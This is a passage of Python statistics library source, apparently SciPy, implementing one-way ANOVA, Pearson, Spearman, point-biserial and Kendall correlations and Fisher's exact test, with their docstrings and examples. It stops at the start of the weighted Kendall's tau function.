>>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
... 0.0689]
>>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
>>> stats.f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
(7.1210194716424473, 0.00028122423145345439)
"""
args = [np.asarray(arg, dtype=float) for arg in args]
# ANOVA on N groups, each in its own array
num_groups = len(args)
alldata = np.concatenate(args)
bign = len(alldata)
# Determine the mean of the data, and subtract that from all inputs to a
# variance (via sum_of_sq / sq_of_sum) calculation. Variance is invariance
# to a shift in location, and centering all data around zero vastly
# improves numerical stability.
offset = alldata.mean()
alldata -= offset
sstot = _sum_of_squares(alldata) - (_square_of_sums(alldata) / bign)
ssbn = 0
for a in args:
ssbn += _square_of_sums(a - offset) / len(a)
# Naming: variables ending in bn/b are for "between treatments", wn/w are
# for "within treatments"
ssbn -= _square_of_sums(alldata) / bign
sswn = sstot - ssbn
dfbn = num_groups - 1
dfwn = bign - num_groups
msb = ssbn / dfbn
msw = sswn / dfwn
f = msb / msw
prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf
return F_onewayResult(f, prob)
class PearsonRConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficent "
"is not defined.")
self.args = (msg,)
class PearsonRNearConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is nearly constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is nearly constant; the computed "
"correlation coefficent may be inaccurate.")
self.args = (msg,)
def pearsonr(x, y):
r"""
Pearson correlation coefficient and p-value for testing non-correlation.
The Pearson correlation coefficient [1]_ measures the linear relationship
between two datasets. The calculation of the p-value relies on the
assumption that each dataset is normally distributed. (See Kowalski [3]_
for a discussion of the effects of non-normality of the input on the
distribution of the correlation coefficient.) Like other correlation
coefficients, this one varies between -1 and +1 with 0 implying no
correlation. Correlations of -1 or +1 imply an exact linear relationship.
Positive correlations imply that as x increases, so does y. Negative
correlations imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Pearson correlation at least as extreme
as the one computed from these datasets.
Parameters
----------
x : (N,) array_like
Input array.
y : (N,) array_like
Input array.
Returns
-------
r : float
Pearson's correlation coefficient.
p-value : float
Two-tailed p-value.
Warns
-----
PearsonRConstantInputWarning
Raised if an input is a constant array. The correlation coefficient
is not defined in this case, so ``np.nan`` is returned.
PearsonRNearConstantInputWarning
Raised if an input is "nearly" constant. The array ``x`` is considered
nearly constant if ``norm(x - mean(x)) < 1e-13 * abs(mean(x))``.
Numerical errors in the calculation ``x - mean(x)`` in this case might
result in an inaccurate calculation of r.
See Also
--------
spearmanr : Spearman rank-order correlation coefficient.
kendalltau : Kendall's tau, a correlation measure for ordinal data.
Notes
-----
The correlation coefficient is calculated as follows:
.. math::
r = \frac{\sum (x - m_x) (y - m_y)}
{\sqrt{\sum (x - m_x)^2 \sum (y - m_y)^2}}
where :math:`m_x` is the mean of the vector :math:`x` and :math:`m_y` is
the mean of the vector :math:`y`.
Under the assumption that x and y are drawn from independent normal
distributions (so the population correlation coefficient is 0), the
probability density function of the sample correlation coefficient r
is ([1]_, [2]_)::
(1 - r**2)**(n/2 - 2)
f(r) = ---------------------
B(1/2, n/2 - 1)
where n is the number of samples, and B is the beta function. This
is sometimes referred to as the exact distribution of r. This is
the distribution that is used in `pearsonr` to compute the p-value.
The distribution is a beta distribution on the interval [-1, 1],
with equal shape parameters a = b = n/2 - 1. In terms of SciPy's
implementation of the beta distribution, the distribution of r is::
dist = scipy.stats.beta(n/2 - 1, n/2 - 1, loc=-1, scale=2)
The p-value returned by `pearsonr` is a two-sided p-value. For a
given sample with correlation coefficient r, the p-value is
the probability that abs(r') of a random sample x' and y' drawn from
the population with zero correlation would be greater than or equal
to abs(r). In terms of the object ``dist`` shown above, the p-value
for a given r and length n can be computed as::
p = 2*dist.cdf(-abs(r))
When n is 2, the above continuous distribution is not well-defined.
One can interpret the limit of the beta distribution as the shape
parameters a and b approach a = b = 0 as a discrete distribution with
equal probability masses at r = 1 and r = -1. More directly, one
can observe that, given the data x = [x1, x2] and y = [y1, y2], and
assuming x1 != x2 and y1 != y2, the only possible values for r are 1
and -1. Because abs(r') for any sample x' and y' with length 2 will
be 1, the two-sided p-value for a sample of length 2 is always 1.
References
----------
.. [1] "Pearson correlation coefficient", Wikipedia,
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
.. [2] Student, "Probable error of a correlation coefficient",
Biometrika, Volume 6, Issue 2-3, 1 September 1908, pp. 302-310.
.. [3] C. J. Kowalski, "On the Effects of Non-Normality on the Distribution
of the Sample Product-Moment Correlation Coefficient"
Journal of the Royal Statistical Society. Series C (Applied
Statistics), Vol. 21, No. 1 (1972), pp. 1-12.
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pearsonr(a, b)
(0.8660254037844386, 0.011724811003954649)
>>> stats.pearsonr([1, 2, 3, 4, 5], [10, 9, 2.5, 6, 4])
(-0.7426106572325057, 0.1505558088534455)
"""
n = len(x)
if n != len(y):
raise ValueError('x and y must have the same length.')
if n < 2:
raise ValueError('x and y must have length at least 2.')
x = np.asarray(x)
y = np.asarray(y)
# If an input is constant, the correlation coefficient is not defined.
if (x == x[0]).all() or (y == y[0]).all():
warnings.warn(PearsonRConstantInputWarning())
return np.nan, np.nan
# dtype is the data type for the calculations. This expression ensures
# that the data type is at least 64 bit floating point. It might have
# more precision if the input is, for example, np.longdouble.
dtype = type(1.0 + x[0] + y[0])
if n == 2:
return dtype(np.sign(x[1] - x[0])*np.sign(y[1] - y[0])), 1.0
xmean = x.mean(dtype=dtype)
ymean = y.mean(dtype=dtype)
# By using `astype(dtype)`, we ensure that the intermediate calculations
# use at least 64 bit floating point.
xm = x.astype(dtype) - xmean
ym = y.astype(dtype) - ymean
# Unlike np.linalg.norm or the expression sqrt((xm*xm).sum()),
# scipy.linalg.norm(xm) does not overflow if xm is, for example,
# [-5e210, 5e210, 3e200, -3e200]
normxm = linalg.norm(xm)
normym = linalg.norm(ym)
threshold = 1e-13
if normxm < threshold*abs(xmean) or normym < threshold*abs(ymean):
# If all the values in x (likewise y) are very close to the mean,
# the loss of precision that occurs in the subtraction xm = x - xmean
# might result in large errors in r.
warnings.warn(PearsonRNearConstantInputWarning())
r = np.dot(xm/normxm, ym/normym)
# Presumably, if abs(r) > 1, then it is only some small artifact of
# floating point arithmetic.
r = max(min(r, 1.0), -1.0)
# As explained in the docstring, the p-value can be computed as
# p = 2*dist.cdf(-abs(r))
# where dist is the beta distribution on [-1, 1] with shape parameters
# a = b = n/2 - 1. `special.btdtr` is the CDF for the beta distribution
# on [0, 1]. To use it, we make the transformation x = (r + 1)/2; the
# shape parameters do not change. Then -abs(r) used in `cdf(-abs(r))`
# becomes x = (-abs(r) + 1)/2 = 0.5*(1 - abs(r)). (r is cast to float64
# to avoid a TypeError raised by btdtr when r is higher precision.)
ab = n/2 - 1
prob = 2*special.btdtr(ab, ab, 0.5*(1 - abs(np.float64(r))))
return r, prob
def fisher_exact(table, alternative='two-sided'):
"""
Perform a Fisher exact test on a 2x2 contingency table.
Parameters
----------
table : array_like of ints
A 2x2 contingency table. Elements should be non-negative integers.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
Returns
-------
oddsratio : float
This is prior odds ratio and not a posterior estimate.
p_value : float
P-value, the probability of obtaining a distribution at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
See Also
--------
chi2_contingency : Chi-square test of independence of variables in a
contingency table.
Notes
-----
The calculated odds ratio is different from the one R uses. This scipy
implementation returns the (more common) "unconditional Maximum
Likelihood Estimate", while R uses the "conditional Maximum Likelihood
Estimate".
For tables with large numbers, the (inexact) chi-square test implemented
in the function `chi2_contingency` can also be used.
Examples
--------
Say we spend a few days counting whales and sharks in the Atlantic and
Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
Indian ocean 2 whales and 5 sharks. Then our contingency table is::
Atlantic Indian
whales 8 2
sharks 1 5
We use this table to find the p-value:
>>> import scipy.stats as stats
>>> oddsratio, pvalue = stats.fisher_exact([[8, 2], [1, 5]])
>>> pvalue
0.0349...
The probability that we would observe this or an even more imbalanced ratio
by chance is about 3.5%. A commonly used significance level is 5%--if we
adopt that, we can therefore conclude that our observed imbalance is
statistically significant; whales prefer the Atlantic while sharks prefer
the Indian ocean.
"""
hypergeom = distributions.hypergeom
c = np.asarray(table, dtype=np.int64) # int32 is not enough for the algorithm
if not c.shape == (2, 2):
raise ValueError("The input `table` must be of shape (2, 2).")
if np.any(c < 0):
raise ValueError("All values in `table` must be nonnegative.")
if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
# If both values in a row or column are zero, the p-value is 1 and
# the odds ratio is NaN.
return np.nan, 1.0
if c[1, 0] > 0 and c[0, 1] > 0:
oddsratio = c[0, 0] * c[1, 1] / (c[1, 0] * c[0, 1])
else:
oddsratio = np.inf
n1 = c[0, 0] + c[0, 1]
n2 = c[1, 0] + c[1, 1]
n = c[0, 0] + c[1, 0]
def binary_search(n, n1, n2, side):
"""Binary search for where to begin halves in two-sided test."""
if side == "upper":
minval = mode
maxval = n
else:
minval = 0
maxval = mode
guess = -1
while maxval - minval > 1:
if maxval == minval + 1 and guess == minval:
guess = maxval
else:
guess = (maxval + minval) // 2
pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
if side == "upper":
ng = guess - 1
else:
ng = guess + 1
if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
break
elif pguess < pexact:
maxval = guess
else:
minval = guess
if guess == -1:
guess = minval
if side == "upper":
while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess -= 1
while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess += 1
else:
while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess += 1
while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess -= 1
return guess
if alternative == 'less':
pvalue = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
elif alternative == 'greater':
# Same formula as the 'less' case, but with the second column.
pvalue = hypergeom.cdf(c[0, 1], n1 + n2, n1, c[0, 1] + c[1, 1])
elif alternative == 'two-sided':
mode = int((n + 1) * (n1 + 1) / (n1 + n2 + 2))
pexact = hypergeom.pmf(c[0, 0], n1 + n2, n1, n)
pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
epsilon = 1 - 1e-4
if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
return oddsratio, 1.
elif c[0, 0] < mode:
plower = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, plower
guess = binary_search(n, n1, n2, "upper")
pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
else:
pupper = hypergeom.sf(c[0, 0] - 1, n1 + n2, n1, n)
if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, pupper
guess = binary_search(n, n1, n2, "lower")
pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
else:
msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
raise ValueError(msg)
pvalue = min(pvalue, 1.0)
return oddsratio, pvalue
SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))
def spearmanr(a, b=None, axis=0, nan_policy='propagate'):
"""
Calculate a Spearman correlation coefficient with associated p-value.
The Spearman rank-order correlation coefficient is a nonparametric measure
of the monotonicity of the relationship between two datasets. Unlike the
Pearson correlation, the Spearman correlation does not assume that both
datasets are normally distributed. Like other correlation coefficients,
this one varies between -1 and +1 with 0 implying no correlation.
Correlations of -1 or +1 imply an exact monotonic relationship. Positive
correlations imply that as x increases, so does y. Negative correlations
imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Spearman correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
a, b : 1D or 2D array_like, b is optional
One or two 1-D or 2-D arrays containing multiple variables and
observations. When these are 1-D, each represents a vector of
observations of a single variable. For the behavior in the 2-D case,
see under ``axis``, below.
Both arrays need to have the same length in the ``axis`` dimension.
axis : int or None, optional
If axis=0 (default), then each column represents a variable, with
observations in the rows. If axis=1, the relationship is transposed:
each row represents a variable, while the columns contain observations.
If axis=None, then both arrays will be raveled.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
correlation : float or ndarray (2-D square)
Spearman correlation matrix or correlation coefficient (if only 2
variables are given as parameters. Correlation matrix is square with
length equal to total number of variables (columns or rows) in ``a``
and ``b`` combined.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
that two sets of data are uncorrelated, has same dimension as rho.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 14.7
Examples
--------
>>> from scipy import stats
>>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
(0.82078268166812329, 0.088587005313543798)
>>> np.random.seed(1234321)
>>> x2n = np.random.randn(100, 2)
>>> y2n = np.random.randn(100, 2)
>>> stats.spearmanr(x2n)
(0.059969996999699973, 0.55338590803773591)
>>> stats.spearmanr(x2n[:,0], x2n[:,1])
(0.059969996999699973, 0.55338590803773591)
>>> rho, pval = stats.spearmanr(x2n, y2n)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> pval
array([[ 0. , 0.55338591, 0.06435364, 0.53617935],
[ 0.55338591, 0. , 0.27592895, 0.80234077],
[ 0.06435364, 0.27592895, 0. , 0.73039992],
[ 0.53617935, 0.80234077, 0.73039992, 0. ]])
>>> rho, pval = stats.spearmanr(x2n.T, y2n.T, axis=1)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> stats.spearmanr(x2n, y2n, axis=None)
(0.10816770419260482, 0.1273562188027364)
>>> stats.spearmanr(x2n.ravel(), y2n.ravel())
(0.10816770419260482, 0.1273562188027364)
>>> xint = np.random.randint(10, size=(100, 2))
>>> stats.spearmanr(xint)
(0.052760927029710199, 0.60213045837062351)
"""
a, axisout = _chk_asarray(a, axis)
if a.ndim > 2:
raise ValueError("spearmanr only handles 1-D or 2-D arrays")
if b is None:
if a.ndim < 2:
raise ValueError("`spearmanr` needs at least 2 variables to compare")
else:
# Concatenate a and b, so that we now only have to handle the case
# of a 2-D `a`.
b, _ = _chk_asarray(b, axis)
if axisout == 0:
a = np.column_stack((a, b))
else:
a = np.row_stack((a, b))
n_vars = a.shape[1 - axisout]
n_obs = a.shape[axisout]
if n_obs <= 1:
# Handle empty arrays or single observations.
return SpearmanrResult(np.nan, np.nan)
a_contains_nan, nan_policy = _contains_nan(a, nan_policy)
variable_has_nan = np.zeros(n_vars, dtype=bool)
if a_contains_nan:
if nan_policy == 'omit':
return mstats_basic.spearmanr(a, axis=axis, nan_policy=nan_policy)
elif nan_policy == 'propagate':
if a.ndim == 1 or n_vars <= 2:
return SpearmanrResult(np.nan, np.nan)
else:
# Keep track of variables with NaNs, set the outputs to NaN
# only for those variables
variable_has_nan = np.isnan(a).sum(axis=axisout)
a_ranked = np.apply_along_axis(rankdata, axisout, a)
rs = np.corrcoef(a_ranked, rowvar=axisout)
dof = n_obs - 2 # degrees of freedom
# rs can have elements equal to 1, so avoid zero division warnings
olderr = np.seterr(divide='ignore')
try:
# clip the small negative values possibly caused by rounding
# errors before taking the square root
t = rs * np.sqrt((dof/((rs+1.0)*(1.0-rs))).clip(0))
finally:
np.seterr(**olderr)
prob = 2 * distributions.t.sf(np.abs(t), dof)
# For backwards compatibility, return scalars when comparing 2 columns
if rs.shape == (2, 2):
return SpearmanrResult(rs[1, 0], prob[1, 0])
else:
rs[variable_has_nan, :] = np.nan
rs[:, variable_has_nan] = np.nan
return SpearmanrResult(rs, prob)
PointbiserialrResult = namedtuple('PointbiserialrResult',
('correlation', 'pvalue'))
def pointbiserialr(x, y):
r"""
Calculate a point biserial correlation coefficient and its p-value.
The point biserial correlation is used to measure the relationship
between a binary variable, x, and a continuous variable, y. Like other
correlation coefficients, this one varies between -1 and +1 with 0
implying no correlation. Correlations of -1 or +1 imply a determinative
relationship.
This function uses a shortcut formula but produces the same result as
`pearsonr`.
Parameters
----------
x : array_like of bools
Input array.
y : array_like
Input array.
Returns
-------
correlation : float
R value.
pvalue : float
Two-sided p-value.
Notes
-----
`pointbiserialr` uses a t-test with ``n-1`` degrees of freedom.
It is equivalent to `pearsonr.`
The value of the point-biserial correlation can be calculated from:
.. math::
r_{pb} = \frac{\overline{Y_{1}} -
\overline{Y_{0}}}{s_{y}}\sqrt{\frac{N_{1} N_{2}}{N (N - 1))}}
Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
are number of observations coded 0 and 1 respectively; :math:`N` is the
total number of observations and :math:`s_{y}` is the standard
deviation of all the metric observations.
A value of :math:`r_{pb}` that is significantly different from zero is
completely equivalent to a significant difference in means between the two
groups. Thus, an independent groups t Test with :math:`N-2` degrees of
freedom may be used to test whether :math:`r_{pb}` is nonzero. The
relation between the t-statistic for comparing two independent groups and
:math:`r_{pb}` is given by:
.. math::
t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}
References
----------
.. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
Statist., Vol. 20, no.1, pp. 125-126, 1949.
.. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
np. 3, pp. 603-607, 1954.
.. [3] D. Kornbrot "Point Biserial Correlation", In Wiley StatsRef:
Statistics Reference Online (eds N. Balakrishnan, et al.), 2014.
https://doi.org/10.1002/9781118445112.stat06227
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pointbiserialr(a, b)
(0.8660254037844386, 0.011724811003954652)
>>> stats.pearsonr(a, b)
(0.86602540378443871, 0.011724811003954626)
>>> np.corrcoef(a, b)
array([[ 1. , 0.8660254],
[ 0.8660254, 1. ]])
"""
rpb, prob = pearsonr(x, y)
return PointbiserialrResult(rpb, prob)
KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))
def kendalltau(x, y, initial_lexsort=None, nan_policy='propagate', method='auto'):
"""
Calculate Kendall's tau, a correlation measure for ordinal data.
Kendall's tau is a measure of the correspondence between two rankings.
Values close to 1 indicate strong agreement, values close to -1 indicate
strong disagreement. This is the 1945 "tau-b" version of Kendall's
tau [2]_, which can account for ties and which reduces to the 1938 "tau-a"
version [1]_ in absence of ties.
Parameters
----------
x, y : array_like
Arrays of rankings, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
initial_lexsort : bool, optional
Unused (deprecated).
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
method : {'auto', 'asymptotic', 'exact'}, optional
Defines which method is used to calculate the p-value [5]_.
The following options are available (default is 'auto'):
* 'auto': selects the appropriate method based on a trade-off between
speed and accuracy
* 'asymptotic': uses a normal approximation valid for large samples
* 'exact': computes the exact p-value, but can only be used if no ties
are present
Returns
-------
correlation : float
The tau statistic.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
an absence of association, tau = 0.
See Also
--------
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
weightedtau : Computes a weighted version of Kendall's tau.
Notes
-----
The definition of Kendall's tau that is used is [2]_::
tau = (P - Q) / sqrt((P + Q + T) * (P + Q + U))
where P is the number of concordant pairs, Q the number of discordant
pairs, T the number of ties only in `x`, and U the number of ties only in
`y`. If a tie occurs for the same pair in both `x` and `y`, it is not
added to either T or U.
References
----------
.. [1] Maurice G. Kendall, "A New Measure of Rank Correlation", Biometrika
Vol. 30, No. 1/2, pp. 81-93, 1938.
.. [2] Maurice G. Kendall, "The treatment of ties in ranking problems",
Biometrika Vol. 33, No. 3, pp. 239-251. 1945.
.. [3] Gottfried E. Noether, "Elements of Nonparametric Statistics", John
Wiley & Sons, 1967.
.. [4] Peter M. Fenwick, "A new data structure for cumulative frequency
tables", Software: Practice and Experience, Vol. 24, No. 3,
pp. 327-336, 1994.
.. [5] Maurice G. Kendall, "Rank Correlation Methods" (4th Edition),
Charles Griffin & Co., 1970.
Examples
--------
>>> from scipy import stats
>>> x1 = [12, 2, 1, 12, 2]
>>> x2 = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.kendalltau(x1, x2)
>>> tau
-0.47140452079103173
>>> p_value
0.2827454599327748
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `kendalltau` must be of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
elif not x.size or not y.size:
return KendalltauResult(np.nan, np.nan) # Return NaN if arrays are empty
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == 'omit' or npy == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'propagate':
return KendalltauResult(np.nan, np.nan)
elif contains_nan and nan_policy == 'omit':
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.kendalltau(x, y, method=method)
if initial_lexsort is not None: # deprecate to drop!
warnings.warn('"initial_lexsort" is gone!')
def count_rank_tie(ranks):
cnt = np.bincount(ranks).astype('int64', copy=False)
cnt = cnt[cnt > 1]
return ((cnt * (cnt - 1) // 2).sum(),
(cnt * (cnt - 1.) * (cnt - 2)).sum(),
(cnt * (cnt - 1.) * (2*cnt + 5)).sum())
size = x.size
perm = np.argsort(y) # sort on y and convert y to dense ranks
x, y = x[perm], y[perm]
y = np.r_[True, y[1:] != y[:-1]].cumsum(dtype=np.intp)
# stable sort on x and convert x to dense ranks
perm = np.argsort(x, kind='mergesort')
x, y = x[perm], y[perm]
x = np.r_[True, x[1:] != x[:-1]].cumsum(dtype=np.intp)
dis = _kendall_dis(x, y) # discordant pairs
obs = np.r_[True, (x[1:] != x[:-1]) | (y[1:] != y[:-1]), True]
cnt = np.diff(np.nonzero(obs)[0]).astype('int64', copy=False)
ntie = (cnt * (cnt - 1) // 2).sum() # joint ties
xtie, x0, x1 = count_rank_tie(x) # ties in x, stats
ytie, y0, y1 = count_rank_tie(y) # ties in y, stats
tot = (size * (size - 1)) // 2
if xtie == tot or ytie == tot:
return KendalltauResult(np.nan, np.nan)
# Note that tot = con + dis + (xtie - ntie) + (ytie - ntie) + ntie
# = con + dis + xtie + ytie - ntie
con_minus_dis = tot - xtie - ytie + ntie - 2 * dis
tau = con_minus_dis / np.sqrt(tot - xtie) / np.sqrt(tot - ytie)
# Limit range to fix computational errors
tau = min(1., max(-1., tau))
if method == 'exact' and (xtie != 0 or ytie != 0):
raise ValueError("Ties found, exact method cannot be used.")
if method == 'auto':
if (xtie == 0 and ytie == 0) and (size <= 33 or min(dis, tot-dis) <= 1):
method = 'exact'
else:
method = 'asymptotic'
if xtie == 0 and ytie == 0 and method == 'exact':
# Exact p-value, see Maurice G. Kendall, "Rank Correlation Methods" (4th Edition), Charles Griffin & Co., 1970.
c = min(dis, tot-dis)
if size <= 0:
raise ValueError
elif c < 0 or 2*c > size*(size-1):
raise ValueError
elif size == 1:
pvalue = 1.0
elif size == 2:
pvalue = 1.0
elif c == 0:
pvalue = 2.0/math.factorial(size) if size < 171 else 0.0
elif c == 1:
pvalue = 2.0/math.factorial(size-1) if (size-1) < 171 else 0.0
else:
new = [0.0]*(c+1)
new[0] = 1.0
new[1] = 1.0
for j in range(3,size+1):
old = new[:]
for k in range(1,min(j,c+1)):
new[k] += new[k-1]
for k in range(j,c+1):
new[k] += new[k-1] - old[k-j]
pvalue = 2.0*sum(new)/math.factorial(size) if size < 171 else 0.0
elif method == 'asymptotic':
# con_minus_dis is approx normally distributed with this variance [3]_
var = (size * (size - 1) * (2.*size + 5) - x1 - y1) / 18. + (
2. * xtie * ytie) / (size * (size - 1)) + x0 * y0 / (9. *
size * (size - 1) * (size - 2))
pvalue = special.erfc(np.abs(con_minus_dis) / np.sqrt(var) / np.sqrt(2))
else:
raise ValueError("Unknown method "+str(method)+" specified, please use auto, exact or asymptotic.")
return KendalltauResult(tau, pvalue)
WeightedTauResult = namedtuple('WeightedTauResult', ('correlation', 'pvalue'))
def weightedtau(x, y, rank=True, weigher=None, additive=True):
r"""
Compute a weighted version of Kendall's :math:`\tau`.
The weighted :math:`\tau` is a weighted version of Kendall's
:math:`\tau` in which exchanges of high weight are more influential than
exchanges of low weight. The default parameters compute the additive
hyperbolic version of the index, :math:`\tau_\mathrm h`, which has
been shown to provide the best balance between important and
unimportant elements [1]_.
The weighting is defined by means of a rank array, which assigns a
nonnegative rank to each element, and a weigher function, which
assigns a weight based from the rank to each element. The weight of an
exchange is then the sum or the product of the weights of the ranks of
the exchanged elements. The default parameters compute
:math:`\tau_\mathrm h`: an exchange between elements with rank
:math:`r` and :math:`s` (starting from zero) has weight
:math:`1/(r+1) + 1/(s+1)`.
Specifying a rank array is meaningful only if you have in mind an
external criterion of importance. If, as it usually happens, you do
not have in mind a specific rank, the weighted :math:`\tau` is
defined by averaging the values obtained using the decreasing
lexicographical rank by (`x`, `y`) and by (`y`, `x`). This is the
behavior with default parameters.
Note that if you are computing the weighted :math:`\tau` on arrays of
ranks, rather than of scores (i.e., a larger value implies a lower
rank) you must negate the ranks, so that elements of higher rank are
associated with a larger value.
Parameters
----------
x, y : array_like
Arrays of scores, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
rank : array_like of ints or bool, optional
A nonnegative rank assigned to each element. If it is None, the
decreasing lexicographical rank by (`x`, `y`) will be used: elements of
higher rank will be those with larger `x`-values, using `y`-values to
break ties (in particular, swapping `x` and `y` will give a different
result). If it is False, the element indices will be used
directly as ranks. The default is True, in which case this
function returns the average of the values obtained using the
decreasing lexicographical rank by (`x`, `y`) and by (`y`, `x`).
weigher : callable, optional
The weigher function. Must map nonnegative integers (zero
representing the most important element) to a nonnegative weight.
The default, None, provides hyperbolic weighing, that is,
rank :math:`r` is mapped to weight :math:`1/(r+1)`.
additive : bool, optional
If True, the weight of an exchange is computed by adding the
weights of the ranks of the exchanged elements; otherwise, the weights
are multiplied. The default is True.
Returns
-------
correlation : float
The weighted :math:`\tau` correlation index.
pvalue : float
Presently ``np.nan``, as the null statistics is unknown (even in the
additive hyperbolic case).
See Also
--------
kendalltau : Calculates Kendall's tau.
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
Notes
-----
This function uses an :math:`O(n \log n)`, mergesort-based algorithm
[1]_ that is a weighted extension of Knight's algorithm for Kendall's
:math:`\tau` [2]_. It can compute Shieh's weighted :math:`\tau` [3]_
between rankings without ties (i.e., permutations) by setting
`additive` and `rank` to False, as the definition given in [1]_ is a
generalization of Shieh's.
NaNs are considered the smallest possible score.
.. versionadded:: 0.19.0
References
----------
.. [1] Sebastiano Vigna, "A weighted correlation index for rankings with
ties", Proceedings of the 24th international conference on World
Wide Web, pp. 1166-1176, ACM, 2015.
.. [2] W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
Ungrouped Data", Journal of the American Statistical Association,
Vol. 61, No. 314, Part 1, pp. 436-439, 1966.
.. [3] Grace S. Shieh. "A weighted Kendall's tau statistic", Statistics &
Probability Letters, Vol. 39, No. 1, pp. 17-24, 1998.
Examples
--------
>>> from scipy import stats
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
>>> p_value
nan
>>> tau, p_value = stats.weightedtau(x, y, additive=False)
>>> tau
-0.62205716951801038
NaNs are considered the smallest possible score:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, np.nan]
>>> tau, _ = stats.weightedtau(x, y)
>>> tau
-0.56694968153682723
This is exactly Kendall's tau:
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> tau, _ = stats.weightedtau(x, y, weigher=lambda x: 1)
>>> tau
-0.47140452079103173
>>> x = [12, 2, 1, 12, 2]
>>> y = [1, 4, 7, 1, 0]
>>> stats.weightedtau(x, y, rank=None)
WeightedTauResult(correlation=-0.4157652301037516, pvalue=nan)
>>> stats.weightedtau(y, x, rank=None)
WeightedTauResult(correlation=-0.7181341329699028, pvalue=nan)
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
